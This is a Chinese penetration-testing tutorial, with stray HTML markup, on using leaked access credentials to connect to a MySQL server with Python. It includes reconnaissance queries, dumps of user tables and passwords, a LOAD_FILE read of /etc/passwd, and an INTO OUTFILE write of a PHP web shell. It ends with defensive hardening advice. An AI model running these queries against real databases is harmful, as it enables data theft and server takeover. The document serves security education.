MySQL数据库渗透实战教学文档<\/h1>

0x01 背景知识<\/h2>

AKSK概念解析<\/h3>

Access Key (AK)<\/strong><\/p>

用途：唯一标识用户或应用程序的身份凭证<\/li>
格式：字母、数字组合的字符串<\/li>
示例：${MYSQL_USER:xxx_db}<\/code><\/li> <\/ul> <\/li>
Secret Key (SK)<\/strong><\/p> 用途：用于API请求签名的私密密钥，确保请求真实性和完整性<\/li> 格式：较长的高随机性复杂字符串<\/li> 示例：${MYSQL_PWD:pwdxxxx}<\/code><\/li> <\/ul> <\/li> <\/ul> MySQL连接信息格式<\/h3> jdbc:mysql:\/\/${MYSQL_HOST:IP}:${MYSQL_PORT:3306}\/${MYSQL_DB:xxxx}? <\/code><\/pre> 包含主机IP、端口(默认3306)、数据库名等关键信息<\/li> <\/ul> 0x02 环境准备<\/h2> Python库安装<\/h3> pip install pymysql <\/span><\/span><\/code><\/pre>PyMySQL特点<\/strong>：<\/p> 纯Python实现的MySQL客户端库<\/li> 不依赖MySQL的C库<\/li> 跨平台兼容性好<\/li> 支持Python3<\/li> <\/ul> 0x03 渗透实战代码<\/h2> 基础连接与查询<\/h3> import<\/span> pymysql.cursors <\/span><\/span> <\/span><\/span># 建立数据库连接<\/span> <\/span><\/span>connection =<\/span> pymysql.<\/span>connect( <\/span><\/span> host=<\/span>'ip'<\/span>, # 目标MySQL服务器IP<\/span> <\/span><\/span> user=<\/span>'xxx_db'<\/span>, # 数据库用户名<\/span> <\/span><\/span> password=<\/span>'pwdxxxx'<\/span>, # 数据库密码<\/span> <\/span><\/span> database=<\/span>'xxxx'<\/span>, # 目标数据库名<\/span> <\/span><\/span> charset=<\/span>'utf8mb4'<\/span>, # 字符编码设置<\/span> <\/span><\/span> cursorclass=<\/span>pymysql.<\/span>cursors.<\/span>DictCursor # 返回字典格式结果<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>try<\/span>: <\/span><\/span> with<\/span> connection.<\/span>cursor() as<\/span> cursor: <\/span><\/span> # 执行SQL查询<\/span> <\/span><\/span> sql =<\/span> "SELECT VERSION()"<\/span> # 查询数据库版本<\/span> <\/span><\/span> cursor.<\/span>execute(sql) <\/span><\/span> <\/span><\/span> # 获取查询结果<\/span> <\/span><\/span> result =<\/span> cursor.<\/span>fetchone() <\/span><\/span> print("Database version:"<\/span>, result) <\/span><\/span> <\/span><\/span>finally<\/span>: <\/span><\/span> # 关闭数据库连接<\/span> <\/span><\/span> connection.<\/span>close() <\/span><\/span><\/code><\/pre>0x04 渗透测试扩展<\/h2> 常用渗透查询语句<\/h3> 信息收集<\/strong>：<\/li> <\/ol> -- 查询所有数据库 <\/span><\/span><\/span><\/span>SHOW<\/span> DATABASES; <\/span><\/span> <\/span><\/span>-- 查询当前数据库所有表 <\/span><\/span><\/span><\/span>SHOW<\/span> TABLES; <\/span><\/span> <\/span><\/span>-- 查询表结构 <\/span><\/span><\/span><\/span>DESCRIBE<\/span> table_name<\/span>; <\/span><\/span><\/code><\/pre> 用户权限查询<\/strong>：<\/li> <\/ol> -- 查询当前用户权限 <\/span><\/span><\/span><\/span>SHOW<\/span> GRANTS; <\/span><\/span> <\/span><\/span>-- 查询所有用户及权限 <\/span><\/span><\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> mysql.user<\/span>; <\/span><\/span><\/code><\/pre> 数据提取<\/strong>：<\/li> <\/ol> -- 查询表中所有数据 <\/span><\/span><\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> table_name<\/span> LIMIT<\/span> 100<\/span>; <\/span><\/span> <\/span><\/span>-- 查询特定列数据 <\/span><\/span><\/span><\/span>SELECT<\/span> username, password FROM<\/span> users; <\/span><\/span><\/code><\/pre>高级渗透技巧<\/h3> 批量查询表数据<\/strong>：<\/li> <\/ol> # 获取所有表名<\/span> <\/span><\/span>cursor.<\/span>execute("SHOW TABLES"<\/span>) <\/span><\/span>tables =<\/span> cursor.<\/span>fetchall() <\/span><\/span> <\/span><\/span>for<\/span> table in<\/span> tables: <\/span><\/span> table_name =<\/span> table['Tables_in_xxxx'<\/span>] # 替换实际数据库名<\/span> <\/span><\/span> print(f<\/span>"<\/span>\n<\/span>Table: <\/span>{<\/span>table_name}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span> # 查询表数据<\/span> <\/span><\/span> cursor.<\/span>execute(f<\/span>"SELECT * FROM <\/span>{<\/span>table_name}<\/span> LIMIT 5"<\/span>) <\/span><\/span> rows =<\/span> cursor.<\/span>fetchall() <\/span><\/span> for<\/span> row in<\/span> rows: <\/span><\/span> print(row) <\/span><\/span><\/code><\/pre> 文件读取操作<\/strong>（需足够权限）：<\/li> <\/ol> -- 读取服务器文件 <\/span><\/span><\/span><\/span>SELECT<\/span> LOAD_FILE('\/etc\/passwd'<\/span>); <\/span><\/span><\/code><\/pre> 写入文件操作<\/strong>（需足够权限）：<\/li> <\/ol> -- 写入文件 <\/span><\/span><\/span><\/span>SELECT<\/span> '恶意内容'<\/span> INTO<\/span> OUTFILE '\/var\/www\/html\/shell.php'<\/span>; <\/span><\/span><\/code><\/pre>0x05 安全防护建议<\/h2> AKSK保护措施<\/strong>：<\/p> 定期轮换访问密钥<\/li> 最小权限原则分配权限<\/li> 避免硬编码在代码中<\/li> <\/ul> <\/li> MySQL安全配置<\/strong>：<\/p> 限制远程访问IP<\/li> 使用强密码策略<\/li> 定期更新MySQL版本<\/li> 禁用LOAD_FILE<\/code>和INTO OUTFILE<\/code>权限<\/li> <\/ul> <\/li> 监控与审计<\/strong>：<\/p> 启用MySQL日志<\/li> 监控异常查询行为<\/li> 定期审计数据库权限<\/li> <\/ul> <\/li> <\/ol> 0x06 总结<\/h2> 本教学文档详细介绍了基于AKSK凭证的MySQL数据库渗透测试流程，从基础连接到高级查询技术，涵盖了信息收集、权限提升和数据提取等关键环节。同时提供了防护建议，帮助安全人员理解攻击手法并加强防御。<\/p>